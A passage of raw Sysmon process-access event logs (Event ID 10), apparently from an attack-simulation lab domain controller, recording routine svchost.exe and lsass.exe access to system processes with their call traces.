05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 